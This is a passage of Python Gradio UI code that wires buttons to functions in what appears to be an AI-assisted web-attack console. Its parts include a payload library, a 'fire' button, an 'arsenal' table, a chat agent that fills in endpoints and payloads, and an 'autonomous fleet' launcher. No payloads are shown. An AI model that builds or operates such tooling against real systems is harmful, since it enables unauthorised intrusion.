) if (tid in st["arsenal"] and evt.index
and len(st["arsenal"][tid]) > evt.index[0]) else ("", "", "", "GET"),
inputs=[wr_target, engine_state],
outputs=[ep_in, pl_in, code_editor, http_method_sel]
)
lib_table.select(
lambda evt, df: df.iloc[evt.index[0]]["Payload"]
if (evt.index and len(df) > evt.index[0]) else "",
inputs=[lib_table],
outputs=pl_in
)
fire_btn.click(
execute_manual_wrap,
inputs=[wr_target, ep_in, pl_in, code_editor, http_method_sel, use_code_chk, engine_state],
outputs=[fire_res, engine_state, arsenal_table, log_viewer]
)
clear_btn.click(
lambda: ("", "", PAYLOAD_CODE_TEMPLATES["Custom"], "GET"),
outputs=[ep_in, pl_in, code_editor, http_method_sel]
)
chat_btn.click(
centaur_chat_agent,
inputs=[chat_in, chatbot, wr_target, engine_state,
ep_in, pl_in, code_editor, http_method_sel, api_key],
outputs=[chatbot, ep_in, pl_in, code_editor, http_method_sel, engine_state]
).then(
lambda tid, st: pd.DataFrame(st["arsenal"].get(tid, [])),
inputs=[wr_target, engine_state],
outputs=arsenal_table
).then(lambda: "", outputs=chat_in)
patch_code_btn.click(
patch_code_with_ai,
inputs=[code_editor, chat_in, wr_target, engine_state, api_key],
outputs=[code_editor, patch_result]
).then(lambda: "", outputs=chat_in)
fleet_deploy.click(
run_autonomous_fleet,
inputs=[fleet_select, api_key, engine_state],
outputs=[fleet_md, fleet_html, fleet_logs]
)
if __name__ == "__main__":
demo.launch(share=False, server_name="0.0.0.0", server_port=7860)